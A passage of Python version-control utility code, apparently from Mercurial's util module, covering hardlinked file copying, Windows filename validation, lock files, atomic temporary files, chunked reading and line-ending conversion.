1777 1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1778 1778 num += n
1779 1779 else:
1780 1780 if hardlink is None:
1781 1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1782 1782 os.stat(os.path.dirname(dst)).st_dev)
1783 1783 settopic()
1784 1784
1785 1785 if hardlink:
1786 1786 try:
1787 1787 oslink(src, dst)
1788 1788 except (IOError, OSError):
1789 1789 hardlink = False
1790 1790 shutil.copy(src, dst)
1791 1791 else:
1792 1792 shutil.copy(src, dst)
1793 1793 num += 1
1794 1794 if progress:
1795 1795 progress.increment()
1796 1796
1797 1797 return hardlink, num
1798 1798
1799 1799 _winreservednames = {
1800 1800 'con', 'prn', 'aux', 'nul',
1801 1801 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1802 1802 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1803 1803 }
1804 1804 _winreservedchars = ':*?"<>|'
1805 1805 def checkwinfilename(path):
1806 1806 r'''Check that the base-relative path is a valid filename on Windows.
1807 1807 Returns None if the path is ok, or a UI string describing the problem.
1808 1808
1809 1809 >>> checkwinfilename(b"just/a/normal/path")
1810 1810 >>> checkwinfilename(b"foo/bar/con.xml")
1811 1811 "filename contains 'con', which is reserved on Windows"
1812 1812 >>> checkwinfilename(b"foo/con.xml/bar")
1813 1813 "filename contains 'con', which is reserved on Windows"
1814 1814 >>> checkwinfilename(b"foo/bar/xml.con")
1815 1815 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1816 1816 "filename contains 'AUX', which is reserved on Windows"
1817 1817 >>> checkwinfilename(b"foo/bar/bla:.txt")
1818 1818 "filename contains ':', which is reserved on Windows"
1819 1819 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1820 1820 "filename contains '\\x07', which is invalid on Windows"
1821 1821 >>> checkwinfilename(b"foo/bar/bla ")
1822 1822 "filename ends with ' ', which is not allowed on Windows"
1823 1823 >>> checkwinfilename(b"../bar")
1824 1824 >>> checkwinfilename(b"foo\\")
1825 1825 "filename ends with '\\', which is invalid on Windows"
1826 1826 >>> checkwinfilename(b"foo\\/bar")
1827 1827 "directory name ends with '\\', which is invalid on Windows"
1828 1828 '''
1829 1829 if path.endswith('\\'):
1830 1830 return _("filename ends with '\\', which is invalid on Windows")
1831 1831 if '\\/' in path:
1832 1832 return _("directory name ends with '\\', which is invalid on Windows")
1833 1833 for n in path.replace('\\', '/').split('/'):
1834 1834 if not n:
1835 1835 continue
1836 1836 for c in _filenamebytestr(n):
1837 1837 if c in _winreservedchars:
1838 1838 return _("filename contains '%s', which is reserved "
1839 1839 "on Windows") % c
1840 1840 if ord(c) <= 31:
1841 1841 return _("filename contains '%s', which is invalid "
1842 1842 "on Windows") % stringutil.escapestr(c)
1843 1843 base = n.split('.')[0]
1844 1844 if base and base.lower() in _winreservednames:
1845 1845 return _("filename contains '%s', which is reserved "
1846 1846 "on Windows") % base
1847 1847 t = n[-1:]
1848 1848 if t in '. ' and n not in '..':
1849 1849 return _("filename ends with '%s', which is not allowed "
1850 1850 "on Windows") % t
1851 1851
1852 1852 if pycompat.iswindows:
1853 1853 checkosfilename = checkwinfilename
1854 1854 timer = time.clock
1855 1855 else:
1856 1856 checkosfilename = platform.checkosfilename
1857 1857 timer = time.time
1858 1858
1859 1859 if safehasattr(time, "perf_counter"):
1860 1860 timer = time.perf_counter
1861 1861
1862 1862 def makelock(info, pathname):
1863 1863 """Create a lock file atomically if possible
1864 1864
1865 1865 This may leave a stale lock file if symlink isn't supported and signal
1866 1866 interrupt is enabled.
1867 1867 """
1868 1868 try:
1869 1869 return os.symlink(info, pathname)
1870 1870 except OSError as why:
1871 1871 if why.errno == errno.EEXIST:
1872 1872 raise
1873 1873 except AttributeError: # no symlink in os
1874 1874 pass
1875 1875
1876 1876 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1877 1877 ld = os.open(pathname, flags)
1878 1878 os.write(ld, info)
1879 1879 os.close(ld)
1880 1880
1881 1881 def readlock(pathname):
1882 1882 try:
1883 1883 return readlink(pathname)
1884 1884 except OSError as why:
1885 1885 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1886 1886 raise
1887 1887 except AttributeError: # no symlink in os
1888 1888 pass
1889 1889 with posixfile(pathname, 'rb') as fp:
1890 1890 return fp.read()
1891 1891
1892 1892 def fstat(fp):
1893 1893 '''stat file object that may not have fileno method.'''
1894 1894 try:
1895 1895 return os.fstat(fp.fileno())
1896 1896 except AttributeError:
1897 1897 return os.stat(fp.name)
1898 1898
1899 1899 # File system features
1900 1900
1901 1901 def fscasesensitive(path):
1902 1902 """
1903 1903 Return true if the given path is on a case-sensitive filesystem
1904 1904
1905 1905 Requires a path (like /foo/.hg) ending with a foldable final
1906 1906 directory component.
1907 1907 """
1908 1908 s1 = os.lstat(path)
1909 1909 d, b = os.path.split(path)
1910 1910 b2 = b.upper()
1911 1911 if b == b2:
1912 1912 b2 = b.lower()
1913 1913 if b == b2:
1914 1914 return True # no evidence against case sensitivity
1915 1915 p2 = os.path.join(d, b2)
1916 1916 try:
1917 1917 s2 = os.lstat(p2)
1918 1918 if s2 == s1:
1919 1919 return False
1920 1920 return True
1921 1921 except OSError:
1922 1922 return True
1923 1923
1924 1924 try:
1925 1925 import re2
1926 1926 _re2 = None
1927 1927 except ImportError:
1928 1928 _re2 = False
1929 1929
1930 1930 class _re(object):
1931 1931 def _checkre2(self):
1932 1932 global _re2
1933 1933 try:
1934 1934 # check if match works, see issue3964
1935 1935 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1936 1936 except ImportError:
1937 1937 _re2 = False
1938 1938
1939 1939 def compile(self, pat, flags=0):
1940 1940 '''Compile a regular expression, using re2 if possible
1941 1941
1942 1942 For best performance, use only re2-compatible regexp features. The
1943 1943 only flags from the re module that are re2-compatible are
1944 1944 IGNORECASE and MULTILINE.'''
1945 1945 if _re2 is None:
1946 1946 self._checkre2()
1947 1947 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1948 1948 if flags & remod.IGNORECASE:
1949 1949 pat = '(?i)' + pat
1950 1950 if flags & remod.MULTILINE:
1951 1951 pat = '(?m)' + pat
1952 1952 try:
1953 1953 return re2.compile(pat)
1954 1954 except re2.error:
1955 1955 pass
1956 1956 return remod.compile(pat, flags)
1957 1957
1958 1958 @propertycache
1959 1959 def escape(self):
1960 1960 '''Return the version of escape corresponding to self.compile.
1961 1961
1962 1962 This is imperfect because whether re2 or re is used for a particular
1963 1963 function depends on the flags, etc, but it's the best we can do.
1964 1964 '''
1965 1965 global _re2
1966 1966 if _re2 is None:
1967 1967 self._checkre2()
1968 1968 if _re2:
1969 1969 return re2.escape
1970 1970 else:
1971 1971 return remod.escape
1972 1972
1973 1973 re = _re()
1974 1974
1975 1975 _fspathcache = {}
1976 1976 def fspath(name, root):
1977 1977 '''Get name in the case stored in the filesystem
1978 1978
1979 1979 The name should be relative to root, and be normcase-ed for efficiency.
1980 1980
1981 1981 Note that this function is unnecessary, and should not be
1982 1982 called, for case-sensitive filesystems (simply because it's expensive).
1983 1983
1984 1984 The root should be normcase-ed, too.
1985 1985 '''
1986 1986 def _makefspathcacheentry(dir):
1987 1987 return dict((normcase(n), n) for n in os.listdir(dir))
1988 1988
1989 1989 seps = pycompat.ossep
1990 1990 if pycompat.osaltsep:
1991 1991 seps = seps + pycompat.osaltsep
1992 1992 # Protect backslashes. This gets silly very quickly.
1993 1993 seps.replace('\\','\\\\')
1994 1994 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1995 1995 dir = os.path.normpath(root)
1996 1996 result = []
1997 1997 for part, sep in pattern.findall(name):
1998 1998 if sep:
1999 1999 result.append(sep)
2000 2000 continue
2001 2001
2002 2002 if dir not in _fspathcache:
2003 2003 _fspathcache[dir] = _makefspathcacheentry(dir)
2004 2004 contents = _fspathcache[dir]
2005 2005
2006 2006 found = contents.get(part)
2007 2007 if not found:
2008 2008 # retry "once per directory" per "dirstate.walk" which
2009 2009 # may take place for each patches of "hg qpush", for example
2010 2010 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2011 2011 found = contents.get(part)
2012 2012
2013 2013 result.append(found or part)
2014 2014 dir = os.path.join(dir, part)
2015 2015
2016 2016 return ''.join(result)
2017 2017
2018 2018 def checknlink(testfile):
2019 2019 '''check whether hardlink count reporting works properly'''
2020 2020
2021 2021 # testfile may be open, so we need a separate file for checking to
2022 2022 # work around issue2543 (or testfile may get lost on Samba shares)
2023 2023 f1, f2, fp = None, None, None
2024 2024 try:
2025 2025 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2026 2026 suffix='1~', dir=os.path.dirname(testfile))
2027 2027 os.close(fd)
2028 2028 f2 = '%s2~' % f1[:-2]
2029 2029
2030 2030 oslink(f1, f2)
2031 2031 # nlinks() may behave differently for files on Windows shares if
2032 2032 # the file is open.
2033 2033 fp = posixfile(f2)
2034 2034 return nlinks(f2) > 1
2035 2035 except OSError:
2036 2036 return False
2037 2037 finally:
2038 2038 if fp is not None:
2039 2039 fp.close()
2040 2040 for f in (f1, f2):
2041 2041 try:
2042 2042 if f is not None:
2043 2043 os.unlink(f)
2044 2044 except OSError:
2045 2045 pass
2046 2046
2047 2047 def endswithsep(path):
2048 2048 '''Check path ends with os.sep or os.altsep.'''
2049 2049 return (path.endswith(pycompat.ossep)
2050 2050 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2051 2051
2052 2052 def splitpath(path):
2053 2053 '''Split path by os.sep.
2054 2054 Note that this function does not use os.altsep because this is
2055 2055 an alternative of simple "xxx.split(os.sep)".
2056 2056 It is recommended to use os.path.normpath() before using this
2057 2057 function if need.'''
2058 2058 return path.split(pycompat.ossep)
2059 2059
2060 2060 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2061 2061 """Create a temporary file with the same contents from name
2062 2062
2063 2063 The permission bits are copied from the original file.
2064 2064
2065 2065 If the temporary file is going to be truncated immediately, you
2066 2066 can use emptyok=True as an optimization.
2067 2067
2068 2068 Returns the name of the temporary file.
2069 2069 """
2070 2070 d, fn = os.path.split(name)
2071 2071 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2072 2072 os.close(fd)
2073 2073 # Temporary files are created with mode 0600, which is usually not
2074 2074 # what we want. If the original file already exists, just copy
2075 2075 # its mode. Otherwise, manually obey umask.
2076 2076 copymode(name, temp, createmode, enforcewritable)
2077 2077
2078 2078 if emptyok:
2079 2079 return temp
2080 2080 try:
2081 2081 try:
2082 2082 ifp = posixfile(name, "rb")
2083 2083 except IOError as inst:
2084 2084 if inst.errno == errno.ENOENT:
2085 2085 return temp
2086 2086 if not getattr(inst, 'filename', None):
2087 2087 inst.filename = name
2088 2088 raise
2089 2089 ofp = posixfile(temp, "wb")
2090 2090 for chunk in filechunkiter(ifp):
2091 2091 ofp.write(chunk)
2092 2092 ifp.close()
2093 2093 ofp.close()
2094 2094 except: # re-raises
2095 2095 try:
2096 2096 os.unlink(temp)
2097 2097 except OSError:
2098 2098 pass
2099 2099 raise
2100 2100 return temp
2101 2101
2102 2102 class filestat(object):
2103 2103 """help to exactly detect change of a file
2104 2104
2105 2105 'stat' attribute is result of 'os.stat()' if specified 'path'
2106 2106 exists. Otherwise, it is None. This can avoid preparative
2107 2107 'exists()' examination on client side of this class.
2108 2108 """
2109 2109 def __init__(self, stat):
2110 2110 self.stat = stat
2111 2111
2112 2112 @classmethod
2113 2113 def frompath(cls, path):
2114 2114 try:
2115 2115 stat = os.stat(path)
2116 2116 except OSError as err:
2117 2117 if err.errno != errno.ENOENT:
2118 2118 raise
2119 2119 stat = None
2120 2120 return cls(stat)
2121 2121
2122 2122 @classmethod
2123 2123 def fromfp(cls, fp):
2124 2124 stat = os.fstat(fp.fileno())
2125 2125 return cls(stat)
2126 2126
2127 2127 __hash__ = object.__hash__
2128 2128
2129 2129 def __eq__(self, old):
2130 2130 try:
2131 2131 # if ambiguity between stat of new and old file is
2132 2132 # avoided, comparison of size, ctime and mtime is enough
2133 2133 # to exactly detect change of a file regardless of platform
2134 2134 return (self.stat.st_size == old.stat.st_size and
2135 2135 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2136 2136 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2137 2137 except AttributeError:
2138 2138 pass
2139 2139 try:
2140 2140 return self.stat is None and old.stat is None
2141 2141 except AttributeError:
2142 2142 return False
2143 2143
2144 2144 def isambig(self, old):
2145 2145 """Examine whether new (= self) stat is ambiguous against old one
2146 2146
2147 2147 "S[N]" below means stat of a file at N-th change:
2148 2148
2149 2149 - S[n-1].ctime < S[n].ctime: can detect change of a file
2150 2150 - S[n-1].ctime == S[n].ctime
2151 2151 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2152 2152 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2153 2153 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2154 2154 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2155 2155
2156 2156 Case (*2) above means that a file was changed twice or more at
2157 2157 same time in sec (= S[n-1].ctime), and comparison of timestamp
2158 2158 is ambiguous.
2159 2159
2160 2160 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2161 2161 timestamp is ambiguous".
2162 2162
2163 2163 But advancing mtime only in case (*2) doesn't work as
2164 2164 expected, because naturally advanced S[n].mtime in case (*1)
2165 2165 might be equal to manually advanced S[n-1 or earlier].mtime.
2166 2166
2167 2167 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2168 2168 treated as ambiguous regardless of mtime, to avoid overlooking
2169 2169 by confliction between such mtime.
2170 2170
2171 2171 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2172 2172 S[n].mtime", even if size of a file isn't changed.
2173 2173 """
2174 2174 try:
2175 2175 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2176 2176 except AttributeError:
2177 2177 return False
2178 2178
2179 2179 def avoidambig(self, path, old):
2180 2180 """Change file stat of specified path to avoid ambiguity
2181 2181
2182 2182 'old' should be previous filestat of 'path'.
2183 2183
2184 2184 This skips avoiding ambiguity, if a process doesn't have
2185 2185 appropriate privileges for 'path'. This returns False in this
2186 2186 case.
2187 2187
2188 2188 Otherwise, this returns True, as "ambiguity is avoided".
2189 2189 """
2190 2190 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2191 2191 try:
2192 2192 os.utime(path, (advanced, advanced))
2193 2193 except OSError as inst:
2194 2194 if inst.errno == errno.EPERM:
2195 2195 # utime() on the file created by another user causes EPERM,
2196 2196 # if a process doesn't have appropriate privileges
2197 2197 return False
2198 2198 raise
2199 2199 return True
2200 2200
2201 2201 def __ne__(self, other):
2202 2202 return not self == other
2203 2203
2204 2204 class atomictempfile(object):
2205 2205 '''writable file object that atomically updates a file
2206 2206
2207 2207 All writes will go to a temporary copy of the original file. Call
2208 2208 close() when you are done writing, and atomictempfile will rename
2209 2209 the temporary copy to the original name, making the changes
2210 2210 visible. If the object is destroyed without being closed, all your
2211 2211 writes are discarded.
2212 2212
2213 2213 checkambig argument of constructor is used with filestat, and is
2214 2214 useful only if target file is guarded by any lock (e.g. repo.lock
2215 2215 or repo.wlock).
2216 2216 '''
2217 2217 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2218 2218 self.__name = name # permanent name
2219 2219 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2220 2220 createmode=createmode,
2221 2221 enforcewritable=('w' in mode))
2222 2222
2223 2223 self._fp = posixfile(self._tempname, mode)
2224 2224 self._checkambig = checkambig
2225 2225
2226 2226 # delegated methods
2227 2227 self.read = self._fp.read
2228 2228 self.write = self._fp.write
2229 2229 self.seek = self._fp.seek
2230 2230 self.tell = self._fp.tell
2231 2231 self.fileno = self._fp.fileno
2232 2232
2233 2233 def close(self):
2234 2234 if not self._fp.closed:
2235 2235 self._fp.close()
2236 2236 filename = localpath(self.__name)
2237 2237 oldstat = self._checkambig and filestat.frompath(filename)
2238 2238 if oldstat and oldstat.stat:
2239 2239 rename(self._tempname, filename)
2240 2240 newstat = filestat.frompath(filename)
2241 2241 if newstat.isambig(oldstat):
2242 2242 # stat of changed file is ambiguous to original one
2243 2243 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2244 2244 os.utime(filename, (advanced, advanced))
2245 2245 else:
2246 2246 rename(self._tempname, filename)
2247 2247
2248 2248 def discard(self):
2249 2249 if not self._fp.closed:
2250 2250 try:
2251 2251 os.unlink(self._tempname)
2252 2252 except OSError:
2253 2253 pass
2254 2254 self._fp.close()
2255 2255
2256 2256 def __del__(self):
2257 2257 if safehasattr(self, '_fp'): # constructor actually did something
2258 2258 self.discard()
2259 2259
2260 2260 def __enter__(self):
2261 2261 return self
2262 2262
2263 2263 def __exit__(self, exctype, excvalue, traceback):
2264 2264 if exctype is not None:
2265 2265 self.discard()
2266 2266 else:
2267 2267 self.close()
2268 2268
2269 2269 def unlinkpath(f, ignoremissing=False, rmdir=True):
2270 2270 """unlink and remove the directory if it is empty"""
2271 2271 if ignoremissing:
2272 2272 tryunlink(f)
2273 2273 else:
2274 2274 unlink(f)
2275 2275 if rmdir:
2276 2276 # try removing directories that might now be empty
2277 2277 try:
2278 2278 removedirs(os.path.dirname(f))
2279 2279 except OSError:
2280 2280 pass
2281 2281
2282 2282 def tryunlink(f):
2283 2283 """Attempt to remove a file, ignoring ENOENT errors."""
2284 2284 try:
2285 2285 unlink(f)
2286 2286 except OSError as e:
2287 2287 if e.errno != errno.ENOENT:
2288 2288 raise
2289 2289
2290 2290 def makedirs(name, mode=None, notindexed=False):
2291 2291 """recursive directory creation with parent mode inheritance
2292 2292
2293 2293 Newly created directories are marked as "not to be indexed by
2294 2294 the content indexing service", if ``notindexed`` is specified
2295 2295 for "write" mode access.
2296 2296 """
2297 2297 try:
2298 2298 makedir(name, notindexed)
2299 2299 except OSError as err:
2300 2300 if err.errno == errno.EEXIST:
2301 2301 return
2302 2302 if err.errno != errno.ENOENT or not name:
2303 2303 raise
2304 2304 parent = os.path.dirname(os.path.abspath(name))
2305 2305 if parent == name:
2306 2306 raise
2307 2307 makedirs(parent, mode, notindexed)
2308 2308 try:
2309 2309 makedir(name, notindexed)
2310 2310 except OSError as err:
2311 2311 # Catch EEXIST to handle races
2312 2312 if err.errno == errno.EEXIST:
2313 2313 return
2314 2314 raise
2315 2315 if mode is not None:
2316 2316 os.chmod(name, mode)
2317 2317
2318 2318 def readfile(path):
2319 2319 with open(path, 'rb') as fp:
2320 2320 return fp.read()
2321 2321
2322 2322 def writefile(path, text):
2323 2323 with open(path, 'wb') as fp:
2324 2324 fp.write(text)
2325 2325
2326 2326 def appendfile(path, text):
2327 2327 with open(path, 'ab') as fp:
2328 2328 fp.write(text)
2329 2329
2330 2330 class chunkbuffer(object):
2331 2331 """Allow arbitrary sized chunks of data to be efficiently read from an
2332 2332 iterator over chunks of arbitrary size."""
2333 2333
2334 2334 def __init__(self, in_iter):
2335 2335 """in_iter is the iterator that's iterating over the input chunks."""
2336 2336 def splitbig(chunks):
2337 2337 for chunk in chunks:
2338 2338 if len(chunk) > 2**20:
2339 2339 pos = 0
2340 2340 while pos < len(chunk):
2341 2341 end = pos + 2 ** 18
2342 2342 yield chunk[pos:end]
2343 2343 pos = end
2344 2344 else:
2345 2345 yield chunk
2346 2346 self.iter = splitbig(in_iter)
2347 2347 self._queue = collections.deque()
2348 2348 self._chunkoffset = 0
2349 2349
2350 2350 def read(self, l=None):
2351 2351 """Read L bytes of data from the iterator of chunks of data.
2352 2352 Returns less than L bytes if the iterator runs dry.
2353 2353
2354 2354 If size parameter is omitted, read everything"""
2355 2355 if l is None:
2356 2356 return ''.join(self.iter)
2357 2357
2358 2358 left = l
2359 2359 buf = []
2360 2360 queue = self._queue
2361 2361 while left > 0:
2362 2362 # refill the queue
2363 2363 if not queue:
2364 2364 target = 2**18
2365 2365 for chunk in self.iter:
2366 2366 queue.append(chunk)
2367 2367 target -= len(chunk)
2368 2368 if target <= 0:
2369 2369 break
2370 2370 if not queue:
2371 2371 break
2372 2372
2373 2373 # The easy way to do this would be to queue.popleft(), modify the
2374 2374 # chunk (if necessary), then queue.appendleft(). However, for cases
2375 2375 # where we read partial chunk content, this incurs 2 dequeue
2376 2376 # mutations and creates a new str for the remaining chunk in the
2377 2377 # queue. Our code below avoids this overhead.
2378 2378
2379 2379 chunk = queue[0]
2380 2380 chunkl = len(chunk)
2381 2381 offset = self._chunkoffset
2382 2382
2383 2383 # Use full chunk.
2384 2384 if offset == 0 and left >= chunkl:
2385 2385 left -= chunkl
2386 2386 queue.popleft()
2387 2387 buf.append(chunk)
2388 2388 # self._chunkoffset remains at 0.
2389 2389 continue
2390 2390
2391 2391 chunkremaining = chunkl - offset
2392 2392
2393 2393 # Use all of unconsumed part of chunk.
2394 2394 if left >= chunkremaining:
2395 2395 left -= chunkremaining
2396 2396 queue.popleft()
2397 2397 # offset == 0 is enabled by block above, so this won't merely
2398 2398 # copy via ``chunk[0:]``.
2399 2399 buf.append(chunk[offset:])
2400 2400 self._chunkoffset = 0
2401 2401
2402 2402 # Partial chunk needed.
2403 2403 else:
2404 2404 buf.append(chunk[offset:offset + left])
2405 2405 self._chunkoffset += left
2406 2406 left -= chunkremaining
2407 2407
2408 2408 return ''.join(buf)
2409 2409
2410 2410 def filechunkiter(f, size=131072, limit=None):
2411 2411 """Create a generator that produces the data in the file size
2412 2412 (default 131072) bytes at a time, up to optional limit (default is
2413 2413 to read all data). Chunks may be less than size bytes if the
2414 2414 chunk is the last chunk in the file, or the file is a socket or
2415 2415 some other type of file that sometimes reads less data than is
2416 2416 requested."""
2417 2417 assert size >= 0
2418 2418 assert limit is None or limit >= 0
2419 2419 while True:
2420 2420 if limit is None:
2421 2421 nbytes = size
2422 2422 else:
2423 2423 nbytes = min(limit, size)
2424 2424 s = nbytes and f.read(nbytes)
2425 2425 if not s:
2426 2426 break
2427 2427 if limit:
2428 2428 limit -= len(s)
2429 2429 yield s
2430 2430
2431 2431 class cappedreader(object):
2432 2432 """A file object proxy that allows reading up to N bytes.
2433 2433
2434 2434 Given a source file object, instances of this type allow reading up to
2435 2435 N bytes from that source file object. Attempts to read past the allowed
2436 2436 limit are treated as EOF.
2437 2437
2438 2438 It is assumed that I/O is not performed on the original file object
2439 2439 in addition to I/O that is performed by this instance. If there is,
2440 2440 state tracking will get out of sync and unexpected results will ensue.
2441 2441 """
2442 2442 def __init__(self, fh, limit):
2443 2443 """Allow reading up to <limit> bytes from <fh>."""
2444 2444 self._fh = fh
2445 2445 self._left = limit
2446 2446
2447 2447 def read(self, n=-1):
2448 2448 if not self._left:
2449 2449 return b''
2450 2450
2451 2451 if n < 0:
2452 2452 n = self._left
2453 2453
2454 2454 data = self._fh.read(min(n, self._left))
2455 2455 self._left -= len(data)
2456 2456 assert self._left >= 0
2457 2457
2458 2458 return data
2459 2459
2460 2460 def readinto(self, b):
2461 2461 res = self.read(len(b))
2462 2462 if res is None:
2463 2463 return None
2464 2464
2465 2465 b[0:len(res)] = res
2466 2466 return len(res)
2467 2467
2468 2468 def unitcountfn(*unittable):
2469 2469 '''return a function that renders a readable count of some quantity'''
2470 2470
2471 2471 def go(count):
2472 2472 for multiplier, divisor, format in unittable:
2473 2473 if abs(count) >= divisor * multiplier:
2474 2474 return format % (count / float(divisor))
2475 2475 return unittable[-1][2] % count
2476 2476
2477 2477 return go
2478 2478
2479 2479 def processlinerange(fromline, toline):
2480 2480 """Check that linerange <fromline>:<toline> makes sense and return a
2481 2481 0-based range.
2482 2482
2483 2483 >>> processlinerange(10, 20)
2484 2484 (9, 20)
2485 2485 >>> processlinerange(2, 1)
2486 2486 Traceback (most recent call last):
2487 2487 ...
2488 2488 ParseError: line range must be positive
2489 2489 >>> processlinerange(0, 5)
2490 2490 Traceback (most recent call last):
2491 2491 ...
2492 2492 ParseError: fromline must be strictly positive
2493 2493 """
2494 2494 if toline - fromline < 0:
2495 2495 raise error.ParseError(_("line range must be positive"))
2496 2496 if fromline < 1:
2497 2497 raise error.ParseError(_("fromline must be strictly positive"))
2498 2498 return fromline - 1, toline
2499 2499
2500 2500 bytecount = unitcountfn(
2501 2501 (100, 1 << 30, _('%.0f GB')),
2502 2502 (10, 1 << 30, _('%.1f GB')),
2503 2503 (1, 1 << 30, _('%.2f GB')),
2504 2504 (100, 1 << 20, _('%.0f MB')),
2505 2505 (10, 1 << 20, _('%.1f MB')),
2506 2506 (1, 1 << 20, _('%.2f MB')),
2507 2507 (100, 1 << 10, _('%.0f KB')),
2508 2508 (10, 1 << 10, _('%.1f KB')),
2509 2509 (1, 1 << 10, _('%.2f KB')),
2510 2510 (1, 1, _('%.0f bytes')),
2511 2511 )
2512 2512
2513 2513 class transformingwriter(object):
2514 2514 """Writable file wrapper to transform data by function"""
2515 2515
2516 2516 def __init__(self, fp, encode):
2517 2517 self._fp = fp
2518 2518 self._encode = encode
2519 2519
2520 2520 def close(self):
2521 2521 self._fp.close()
2522 2522
2523 2523 def flush(self):
2524 2524 self._fp.flush()
2525 2525
2526 2526 def write(self, data):
2527 2527 return self._fp.write(self._encode(data))
2528 2528
2529 2529 # Matches a single EOL which can either be a CRLF where repeated CR
2530 2530 # are removed or a LF. We do not care about old Macintosh files, so a
2531 2531 # stray CR is an error.
2532 2532 _eolre = remod.compile(br'\r*\n')
2533 2533
2534 2534 def tolf(s):
2535 2535 return _eolre.sub('\n', s)
2536 2536
2537 2537 def tocrlf(s):
2538 2538 return _eolre.sub('\r\n', s)
2539 2539
2540 2540 def _crlfwriter(fp):
2541 2541 return transformingwriter(fp, tocrlf)
2542 2542
2543 2543 if pycompat.oslinesep == '\r\n':
2544 2544 tonativeeol = tocrlf
2545 2545 fromnativeeol = tolf
2546 2546 nativeeolwriter = _crlfwriter
2547 2547 else:
2548 2548 tonativeeol = pycompat.identity
2549 2549 fromnativeeol = pycompat.identity
2550 2550 nativeeolwriter = pycompat.identity
2551 2551
2552 2552 if (pyplatform.python_implementation() == 'CPython' and
2553 2553 sys.version_info < (3, 0)):
2554 2554 # There is an issue in CPython that some IO methods do not handle EINTR
2555 2555 # correctly. The following table shows what CPython version (and functions)
2556 2556 # are affected (buggy: has the EINTR bug, okay: otherwise):
2557 2557 #
2558 2558 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2559 2559 # --------------------------------------------------
2560 2560 # fp.__iter__ | buggy | buggy | okay
2561 2561 # fp.read* | buggy | okay [1] | okay
2562 2562 #
2563 2563 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2564 2564 #
2565 2565 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2566 2566 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2567 2567 #
2568 2568 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2569 2569 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2570 2570 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2571 2571 # fp.__iter__ but not other fp.read* methods.
2572 2572 #
2573 2573 # On modern systems like Linux, the "read" syscall cannot be interrupted
2574 2574 # when reading "fast" files like on-disk files. So the EINTR issue only
2575 2575 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2576 2576 # files approximately as "fast" files and use the fast (unsafe) code path,
2577 2577 # to minimize the performance impact.
2578 2578 if sys.version_info >= (2, 7, 4):
2579 2579 # fp.readline deals with EINTR correctly, use it as a workaround.
2580 2580 def _safeiterfile(fp):
2581 2581 return iter(fp.readline, '')
2582 2582 else:
2583 2583 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2584 2584 # note: this may block longer than necessary because of bufsize.
2585 2585 def _safeiterfile(fp, bufsize=4096):
2586 2586 fd = fp.fileno()
2587 2587 line = ''
2588 2588 while True:
2589 2589 try:
2590 2590 buf = os.read(fd, bufsize)
2591 2591 except OSError as ex:
2592 2592 # os.read only raises EINTR before any data is read
2593 2593 if ex.errno == errno.EINTR:
2594 2594 continue
2595 2595 else:
2596 2596 raise
2597 2597 line += buf
2598 2598 if '\n' in buf:
2599 2599 splitted = line.splitlines(True)
2600 2600 line = ''
2601 2601 for l in splitted:
2602 2602 if l[-1] == '\n':
2603 2603 yield l
2604 2604 else:
2605 2605 line = l
2606 2606 if not buf:
2607 2607 break
2608 2608 if line:
2609 2609 yield line
2610 2610
2611 2611 def iterfile(fp):
2612 2612 fastpath = True
2613 2613 if type(fp) is file:
2614 2614 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2615 2615 if fastpath:
2616 2616 return fp
2617 2617 else:
2618 2618 return _safeiterfile(fp)
2619 2619 else:
2620 2620 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2621 2621 def iterfile(fp):
2622 2622 return fp
2623 2623
2624 2624 def iterlines(iterator):
2625 2625 for chunk in iterator:
2626 2626 for line in chunk.splitlines():
2627 2627 yield line
2628 2628
2629 2629 def expandpath(path):
2630 2630 return os.path.expanduser(os.path.expandvars(path))
2631 2631
2632 2632 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2633 2633 """Return the result of interpolating items in the mapping into string s.
2634 2634
2635 2635 prefix is a single character string, or a two character string with
2636 2636 a backslash as the first character if the prefix needs to be escaped in
2637 2637 a regular expression.
2638 2638
2639 2639 fn is an optional function that will be applied to the replacement text
2640 2640 just before replacement.
2641 2641
2642 2642 escape_prefix is an optional flag that allows using doubled prefix for
